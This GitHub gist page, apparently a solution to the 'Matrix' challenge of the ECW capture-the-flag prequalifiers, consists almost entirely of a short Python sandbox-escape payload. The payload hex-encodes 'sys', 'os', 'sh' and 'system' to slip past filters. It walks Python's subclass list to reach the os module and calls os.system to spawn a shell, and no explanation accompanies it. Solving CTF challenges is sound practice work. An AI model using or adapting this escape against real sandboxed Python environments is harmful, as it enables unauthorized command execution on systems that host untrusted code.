Skip to content

Instantly share code, notes, and snippets.

@LoadLow
Last active October 21, 2019 21:14
Show Gist options
  • Save LoadLow/9e2b37291250381ee90ab37b417cc61d to your computer and use it in GitHub Desktop.
Save LoadLow/9e2b37291250381ee90ab37b417cc61d to your computer and use it in GitHub Desktop.
ECW Prequals - Challenge "Matrix"
a1 = "\x73\x79\x73" # sys
a2 = "\x6f\x73" # os
a3 = "\x73\x68" # sh
a4 = "\x73\x79\x73\x74\x65\x6d" #system
a5 = getattr([].__class__.__mro__[1].__subclasses__()[104].__init__.__globals__[a1].modules[a2],a4)
a5(a3)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment